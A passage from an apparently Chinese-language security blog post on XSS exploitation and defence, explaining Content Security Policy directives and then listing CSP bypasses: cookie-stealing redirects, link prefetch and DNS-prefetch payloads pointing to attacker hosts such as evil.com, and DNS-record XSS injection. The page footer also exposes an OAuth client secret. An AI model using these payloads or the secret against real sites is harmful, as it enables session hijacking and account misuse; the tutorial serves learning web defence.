<figure class="highlight stylus"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line"> &lt;meta http-equiv=<span class="string">"Content-Security-Policy"</span> <span class="attribute">content</span>=<span class="string">"script-src 'self'; object-src 'none'; style-src cdn.example.org third-party.org; child-src https:"</span>&gt;</div><div class="line"></div><div class="line"> 上面代码中，CSP 做了如下配置。</div><div class="line"></div><div class="line">脚本：只信任当前域名</div><div class="line">&lt;object&gt;标签：不信任任何URL，即不加载任何资源</div><div class="line">样式表：只信任cdn<span class="selector-class">.example</span><span class="selector-class">.org</span>和third-party<span class="selector-class">.org</span></div><div class="line">框架（frame）：必须使用HTTPS协议加载</div><div class="line">其他资源：没有限制</div><div class="line"></div><div class="line">启用后，不符合 CSP 的外部资源就会被阻止加载。</div></pre></td></tr></table></figure>
<p>除了上述的<code>&lt;meta&gt;</code>之外，更为常见的是服务器返回<code>Content-Security-Policy</code>字段,一个CSP头由多组CSP策略组成，中间由分号分隔,其中每一组策略包含一个策略指令和一个内容源列表:</p>
<figure class="highlight csp"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="attribute">Content-Security-Policy</span>: <span class="keyword">default-src</span> <span class="string">'self'</span> www.baidu.com; <span class="keyword">script-src</span> <span class="string">'unsafe-inline'</span></div></pre></td></tr></table></figure>
<p><code>default-src</code>指令定义了那些没有被更精确指令指定的安全策略,即如果后面没有指定，就是用<code>default-src</code>策略:</p>
<ul>
<li><p>child-src</p>
<p>  定义了<code>web workers</code>以及嵌套的浏览上下文（如<code>&lt;frame&gt;</code>和<code>&lt;iframe&gt;</code>）的源</p>
</li>
<li><p>connect-src</p>
<p>  定义了请求、<code>XMLHttpRequest</code>、<code>WebSocket</code>和<code>EventSource</code>的连接来源</p>
</li>
<li><p>font-src</p>
<p>  字体加载的有效来源</p>
</li>
<li><p>img-src</p>
<p>  定义了页面中图片和图标的有效来源</p>
</li>
<li><p>media-src</p>
<p>  定义了页面中媒体流有效来源</p>
</li>
<li>object-src</li>
<li><p>script-src</p>
<p>  页面中Javascript的有效来源</p>
</li>
<li><p>style-src</p>
<p>  页面中CSS样式的有效来源</p>
</li>
</ul>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">关键字：</div><div class="line"><span class="string">'none'</span>: 代表空集；即不匹配任何 <span class="built_in">URL</span>。</div><div class="line"><span class="string">'self'</span>: 代表和文档同源，包括相同的 <span class="built_in">URL</span> 协议和端口号</div><div class="line"><span class="string">'unsafe-inline'</span>: 允许使用内联资源</div></pre></td></tr></table></figure>
<h5 id="CSP常见绕过"><a href="#CSP常见绕过" class="headerlink" title="# CSP常见绕过"></a># CSP常见绕过</h5><ol>
<li><p>url跳转</p>
 <figure class="highlight http"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line"><span class="attribute">default-src</span>: 'none'情况下:</div><div class="line"></div><div class="line"><span class="javascript">&lt;meta http-equiv=<span class="string">"refresh"</span> content=<span class="string">"1;url=http://www.xss.com/x.php?c=[cookie]"</span> &gt;</span></div><div class="line"></div><div class="line">允许unsafe-inline情况下,使用<span class="built_in">window</span>.location或<span class="built_in">window</span>.open:</div><div class="line"></div><div class="line"><span class="xml"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"></span></span></div><div class="line">    <span class="built_in">window</span>.location=<span class="string">"http://www.xss.com/x.php?c=[cookie]"</span>;</div><div class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></div></pre></td></tr></table></figure>
</li>
<li><p><code>&lt;link&gt;</code>标签预加载</p>
<blockquote>
<p>CSP对link标签的预加载功能考虑不完善</p>
</blockquote>
<p> 在chrome下,可以使用link预加载绕过:</p>
 <figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&lt;link rel="prefetch" href="<span class="link">http://evil.com/x.php?c=</span>[<span class="string">cookie</span>]"&gt;</div></pre></td></tr></table></figure>
<p> 或者在Firfox中使用link dns预解析:</p>
 <figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">link</span> <span class="attr">rel</span>=<span class="string">"dns-prefetch"</span> <span class="attr">href</span>=<span class="string">"//[cookie].xxx.ceye.io"</span>&gt;</span></div></pre></td></tr></table></figure>
</li>
</ol>
<h4 id="要在任何可能地方测试"><a href="#要在任何可能地方测试" class="headerlink" title="要在任何可能地方测试"></a>要在任何可能地方测试</h4><p><a href="http://www.freebuf.com/vuls/142751.html" target="_blank" rel="external">文章来源于这里，给我们提供了一些新的思路</a>  </p>
<p><strong>DNS解析时没有过滤</strong></p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">我使用的子域名是hack.bo0om.<span class="keyword">ru</span>（任何子域名都可以），并且将我的IP设置成了该域名的NS服务器。接下来修改dnschef.ini并完成dnschef的配置，添加下列记录：</div><div class="line"></div><div class="line">[MX]</div><div class="line">*.xss.hack.bo0om.<span class="keyword">ru</span>=<span class="comment">"--&gt;'&gt;&lt;script/src=//bo0om.ru/xss.js&gt;</span></div><div class="line">[NS]</div><div class="line">*.xss.hack.bo0om.<span class="keyword">ru</span>=<span class="comment">"--&gt;'&gt;&lt;script/src=//bo0om.ru/xss.js&gt;</span></div><div class="line">[CNAME]</div><div class="line">*.xss.hack.bo0om.<span class="keyword">ru</span>=<span class="comment">"--&gt;'&gt;&lt;script/src=//bo0om.ru/xss.js&gt;</span></div><div class="line"></div><div class="line">如果某个在线服务得到了DNS数据之后还将它们打印在了屏幕上，只能说明该服务忘记过滤掉这些数据了。</div></pre></td></tr></table></figure>
<p><strong><code>XSS Payload</code>添加到了我<code>Instagram</code>的个人状态</strong></p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">"--&gt;'&gt;<span class="tag">&lt;<span class="name">script</span>/<span class="attr">src</span>=<span class="string">//evil.com/xss.js</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></div></pre></td></tr></table></figure>
<p>如果有些服务器读取了这些信息而没有过滤，则会触发xss。</p>
<p><strong>google play中的 xss</strong><br><code>Linux</code>系统支持在文件名中使用特殊字符。  </p>
<p>虽然我们可以在文件名中注入自己的脚本代码，但坏消息是这里有30个字符的限制。不幸的是，我手上可以使用的域名都有点长，而且那些只有一个或两个字符的域名估计都已经被注册掉了。但是在现代Web中，你可以使用<code>punycode编码</code>来注册域名，而且现在还有很多免费的punycode域名没有被注册。比如说xn–g3h。所以我注册了一个.ws域名（请参考下图，有个符号这里打不出来，包括点号在内一共四个字符）。</p>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:</strong>
    empty_xl
  </li>
  <li class="post-copyright-link">
    <strong>Post link:</strong>
    <a href="https://blog.nyrae.icu/blog/xss-bypass-tricks/" title="XSS利用与防御">https://blog.nyrae.icu/blog/xss-bypass-tricks/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice: </strong>
    All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" rel="external nofollow" target="_blank">CC BY-NC-ND 4.0</a> unless stating additionally.
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/XSS/" rel="tag"><i class="fa fa-tag"></i> XSS</a>
          
            <a href="/tags/web-security/" rel="tag"><i class="fa fa-tag"></i> web security</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/blog/same-origin-policy/" rel="next" title="同源策略">
                <i class="fa fa-chevron-left"></i> 同源策略
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/blog/image/" rel="prev" title="image文件格式解析">
                image文件格式解析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
    <link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">
    <script src="https://imsun.github.io/gitment/dist/gitment.browser.js"></script>
    <script>
    var gitment = new Gitment({
      // 根据文章标题设置唯一评论id
    // id: '', // optional
    owner: 'emptyxl',
    repo: 'emptyxl.github.io',
    oauth: {
      client_id: 'fa7413e3c0207a96ae03',
      client_secret: 'a599fef18d25ba5c813d2e437260892e146462a2',
      }
    })
    gitment.render('comments')
    </script>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            Overview
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.png"
               alt="empty_xl" />
          <p class="site-author-name" itemprop="name">empty_xl</p>
           
              <p class="site-description motion-element" itemprop="description">Hacked By_ EmPTy_xL../ security blog </p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">64</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">20</span>
                <span class="site-state-item-name">categories</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">78</span>
                <span class="site-state-item-name">tags</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/emptyxl" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                    
                      Github
                    
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="/mail/index.html" target="_blank" title="E-Mail">
                  
                    <i class="fa fa-fw fa-envelope"></i>
                  
                    
                      E-Mail
                    
                </a>
              </span>
            
          
        </div>

        
        
          <div class="cc-license motion-element" itemprop="license">
            <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" class="cc-opacity" target="_blank">
              <img src="/images/cc-by-nc-nd.svg" alt="Creative Commons" />
            </a>
          </div>
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS-知识"><span class="nav-number">1.</span> <span class="nav-text">XSS 知识</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#xss-分类"><span class="nav-number">1.1.</span> <span class="nav-text">xss 分类</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#反射型xss"><span class="nav-number">1.1.1.</span> <span class="nav-text">反射型xss</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#存储型xss"><span class="nav-number">1.1.2.</span> <span class="nav-text">存储型xss</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#DOM型xss"><span class="nav-number">1.1.3.</span> <span class="nav-text">DOM型xss</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#xss-危害"><span class="nav-number">1.2.</span> <span class="nav-text">xss 危害</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#xss-利用"><span class="nav-number">2.</span> <span class="nav-text">xss 利用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#了解输出所处环境"><span class="nav-number">2.1.</span> <span class="nav-text">了解输出所处环境</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#闭合"><span class="nav-number">2.2.</span> <span class="nav-text">闭合</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#正则表达式绕过"><span class="nav-number">2.3.</span> <span class="nav-text">正则表达式绕过</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#构造"><span class="nav-number">2.4.</span> <span class="nav-text">构造</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#一些技巧"><span class="nav-number">2.5.</span> <span class="nav-text">一些技巧</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#javascript-伪协议"><span class="nav-number">2.5.1.</span> <span class="nav-text">javascript 伪协议</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#构造恶意图片"><span class="nav-number">2.5.2.</span> <span class="nav-text">构造恶意图片</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#利用CRLF"><span class="nav-number">2.5.3.</span> <span class="nav-text">利用CRLF</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#HTML-闭合优先级"><span class="nav-number">2.5.4.</span> <span class="nav-text">HTML 闭合优先级</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#CSP-bypass"><span class="nav-number">2.6.</span> <span class="nav-text">CSP bypass</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#xss结合上传漏洞"><span class="nav-number">2.6.1.</span> <span class="nav-text">xss结合上传漏洞</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#重定向"><span class="nav-number">2.6.2.</span> <span class="nav-text">重定向</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#利用浏览器漏洞"><span class="nav-number">2.6.3.</span> <span class="nav-text">利用浏览器漏洞</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#xss防御"><span class="nav-number">3.</span> <span class="nav-text">xss防御</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#httponly"><span class="nav-number">3.1.</span> <span class="nav-text">httponly</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#xss-filter"><span class="nav-number">3.2.</span> <span class="nav-text">xss filter</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#编码转义"><span class="nav-number">3.3.</span> <span class="nav-text">编码转义</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#处理富文本"><span class="nav-number">3.4.</span> <span class="nav-text">处理富文本</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#CSP-Content-Security-Policy-内容安全策略"><span class="nav-number">3.5.</span> <span class="nav-text">CSP Content Security Policy 内容安全策略</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#CSP常见绕过"><span class="nav-number">3.5.1.</span> <span class="nav-text"># CSP常见绕过</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#要在任何可能地方测试"><span class="nav-number">3.6.</span> <span class="nav-text">要在任何可能地方测试</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    
    &emsp;&emsp;|&emsp;
  </span>
  <span class="author" itemprop="copyrightHolder">empty_xl</span>
</div>


<div class="powered-by">
  
  Power &mdash; Hexo
</div>

<div class="theme-info">
  
  Theme &mdash; NexT.Mist
</div>
<div>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  

  

  

  

</body>
</html>
